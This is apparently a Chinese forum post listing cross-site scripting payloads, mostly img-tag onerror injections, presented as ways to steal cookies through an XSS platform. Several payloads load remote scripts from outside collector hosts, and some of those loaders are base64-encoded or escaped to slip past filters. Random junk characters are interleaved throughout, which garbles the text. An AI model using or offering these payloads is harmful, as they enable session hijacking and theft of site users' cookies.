<img src='non-exist.jpg'onerror="alert('xss')">
4 u' H8 M' h, W<img src=# onerror=alert(123)>
9 {' n8 l/ p! @7 {+ w) N<img src=# onerror=alert(document.cookie)># M5 | D0 E' v% g- t
下面是利用平台钓cookie的. }$ R* h1 o, c! h: F
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>. m3 H. w3 V q7 a1 s
0 X( i( T' s3 A) l/ r# U. ?
' Q# x3 E; r0 R; `$ \$ G- r
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>" G, I, K; x2 X$ g8 P
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>' x! r7 q+ x0 r/ B- e' X/ s
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>6 r+ S- H1 q: H, {" {8 y
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
* S/ r! T$ X# V<img src="#">+ c- H+ k F- u$ R {! P% w
<img src="#">* e8 p9 F% ]( N0 F, H
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>0 Y0 B; ^3 e* A* P$ w- s
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">7 o% x. W& b. }, S
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))> J; v3 v2 P; l/ ?/ |. z2 {! } t4 A
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>& Q6 n P$ q+ d- y
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
2 S; ] u+ z6 c6 k# p3 Q; t+ Z<img src=x width="0" height="0"></img>+ Y8 k7 o2 N: N. z9 g' g
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
0 a& C. E$ f# J- m* n<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>9 U# X: r9 q5 \1 P: L' C3 d# b$ L/ E
|
发表于 2015-10-18 14:33:54
收藏
支持
反对